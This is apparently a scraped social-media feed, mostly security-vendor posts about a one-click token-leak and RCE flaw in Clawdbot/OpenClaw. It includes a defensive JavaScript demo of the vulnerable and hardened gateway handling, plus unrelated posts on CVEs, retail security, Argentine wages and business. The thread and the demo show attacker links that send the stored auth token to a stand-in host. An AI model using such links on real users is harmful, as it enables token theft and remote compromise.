🚨We found RCE in Clawdbot 🚨
If you're using Clawdbot/Moltbot, I can get RCE on your computer just by getting you to click a link.
The coolest part? This vulnerability (CVE-2026-25253) took only 100 minutes to discover, and it was discovered completely autonomously using @Ethiack's AI pentesting solution "Hackian".
Here's how it went down 👇
We set Hackian against Clawdbot, purely blackbox. It discovered that the Control UI stores the gateway auth token in localStorage and builds the first WebSocket connect frame from it on load.
Hackian discovered that the UI also accepts "gatewayUrl" via query params: /chat?gatewayUrl=wss://attacker. This overrides the saved gateway and auto-connects 😏
On first load, the UI immediately opens a WebSocket to the attacker URL and sends the token!
Think that's cool? Wait until you see how it upgraded this to a full RCE for local Clawdbot systems. Read the deets 👇
https://t.co/nnoOClDYx8
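The override-and-autoconnect flow the thread describes, as an added JavaScript illustration (not Clawdbot/OpenClaw code and not Ethiack's): a resolver that lets a query-string gatewayUrl win over the stored gateway, next to a hardened resolver that only honours an override whose host is on an allowlist, plus a stand-in socket so the first-frame token leak can be observed offline. The localStorage key names, the stored gateway value, the connect-frame shape and the loopback allowlist are all assumptions for the demo.

```javascript
// Added illustration of the bug class from the thread (not the project's own code).
// Assumed: key names, the stored gateway value, the first-frame shape, the allowlist.
const TOKEN_KEY = "gateway.token";   // assumed localStorage key for the auth token
const GATEWAY_KEY = "gateway.url";   // assumed localStorage key for the saved gateway

// Vulnerable: whatever ?gatewayUrl= says replaces the saved gateway, no questions asked.
function resolveGatewayUrlVulnerable(search, storage) {
  const fromQuery = new URLSearchParams(search).get("gatewayUrl");
  return fromQuery || storage.get(GATEWAY_KEY) || null;
}

// Hardened: accept a query override only if it is a ws/wss URL whose host is allowlisted
// (loopback by default, an assumption); anything else is ignored and the saved gateway wins.
function resolveGatewayUrlHardened(search, storage, allowedHosts = ["127.0.0.1", "localhost"]) {
  const fromQuery = new URLSearchParams(search).get("gatewayUrl");
  if (fromQuery) {
    let u = null;
    try { u = new URL(fromQuery); } catch { u = null; }
    const wsScheme = u && (u.protocol === "ws:" || u.protocol === "wss:");
    if (wsScheme && allowedHosts.includes(u.hostname)) return u.toString();
    // Untrusted override: do not connect, so the token never leaves the page.
  }
  return storage.get(GATEWAY_KEY) || null;
}

// Minimal stand-in for the browser WebSocket so the flow runs under Node without a network.
class FakeSocket {
  constructor(url) { this.url = url; this.sent = []; }
  send(frame) { this.sent.push(frame); }
}

// Simulated page load: pick the gateway, open the socket, send the auth frame immediately.
function connectOnLoad(search, storage, resolver, SocketCtor = FakeSocket) {
  const url = resolver(search, storage);
  if (!url) return null;
  const sock = new SocketCtor(url);
  // Assumed frame shape: a JSON "connect" message carrying the stored token.
  sock.send(JSON.stringify({ type: "connect", token: storage.get(TOKEN_KEY) }));
  return sock;
}

// Constructed scenario: a victim with a saved loopback gateway clicks an attacker link.
function demo() {
  const storage = new Map([
    [TOKEN_KEY, "secret-token-123"],           // constructed token
    [GATEWAY_KEY, "ws://127.0.0.1:8080"],      // constructed saved gateway
  ]);
  const attackerLink = "?gatewayUrl=wss://attacker.example";
  const leaked = connectOnLoad(attackerLink, storage, resolveGatewayUrlVulnerable);
  const safe = connectOnLoad(attackerLink, storage, resolveGatewayUrlHardened);
  return {
    leakedTo: leaked.url,          // "wss://attacker.example"
    leakedFrame: leaked.sent[0],   // the connect frame, token included
    safeTo: safe.url,              // the saved loopback gateway, override ignored
  };
}

console.log(demo());
```

The allowlist is one policy; requiring an explicit user confirmation before connecting to any gateway that differs from the saved one is another. Whichever is chosen, the invariant to check is the same: a token read from localStorage must never be sent to an endpoint the page did not previously choose.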
Hackian just uncovered a high-severity vulnerability and achieved 1-click RCE in @openclaw (previously Clawdbot), fully autonomously, in under 2 hours.
We explain how and show you Hackian’s thought process in our latest blog: https://t.co/3SZcKoNuAn
We’ve just analyzed 50,000 assets from European Retail companies.
And there are some concerning data points:
16% of connections use invalid or outdated SSL certificates.
17% of web servers expose their version number, easing criminal exploitation.
Medium-sized retailers, in the 1000-5000 employee range, have the worst posture.
Our new “State of Digital Exposure for European Retail” report uses this data, industry trends, and insights from experts at Nemlig, Carrefour, and others to show what’s to come in Retail.
Read the report and find out what you have to do to stop being a statistic.
Fully accessible here: https://t.co/f3kwKcU7AE
In the AI era, traditional security scanners are obsolete. Ethiack CEO and Founder Jorge Monteiro discusses the transition to autonomous technology that mimics the behavior of real hackers 👇
We’re now detecting the new MongoDB Memory Exposure Vulnerability.
This CVSS 8.7 vulnerability lets unauthenticated attackers read uninitialized heap memory from MongoDB servers, without needing credentials.
Affected versions span MongoDB 3.6 through 8.2. If you're running any of these versions, your database is exposed.
We’re already detecting this vulnerability across your attack surface, so if you’re unsure you’re exposed, check your dashboard.
More info on the CVE here: https://t.co/K9TnadY0hi
This week two massive CVEs affecting React and Next.js were released, with massive repercussions.
CVE-2025-55182 and CVE-2025-66478 are critical unauthenticated RCE vulnerabilities affecting even default configurations.
After the CVEs were announced, we began working on a testing module, and we started testing customers today.
If you use React or Next.js, please upgrade to a hardened release immediately.
Big things brewing in Lisbon: @ethiack and my friend @0xacb are putting together a massive in-person conference! It's all about hacking, security, and AI.
Speakers from @hacker0x01, @bedrocksec, @0xLupin and more. Solid crew, great vibes.
👉🏼 https://t.co/fU6erQ38B0
Elon and Steve Jobs are both famous for pushing people to simplify their designs. I don't think this is a coincidence. Large organizations naturally generate complexity, but if you have a CEO who hates it, this tendency is kept in check.
🚨🇦🇷MILEI’S “CRAZY” PLAN WORKED—ARGENTINA’S PAYCHECKS JUST HIT A 6-YEAR HIGH
Private sector wages in Argentina just spiked to their best level since 2018—real wages hit 107 in Feb 2025, up from a sad 91 in late 2023.
What changed? Oh, just Milei dropping economic reforms like they were hot. People called it “shock therapy.” Turns out, it was more “money therapy.”
Critics yelled, “He’ll crash the economy!” Workers are now yelling, “Payday!”
Love him or hate him, Milei’s free-market rollercoaster is actually handing folks fatter checks—for the first time in forever.
Source: Observatory of Employment and Business Dynamics, @JMilei, @ArgMilei
If you are in SaaS in 2024 and you are not investing in cybersecurity, you are irresponsible.
Doing technology without testing is careless.
You are putting yourself and your customers in danger.
Change my mind.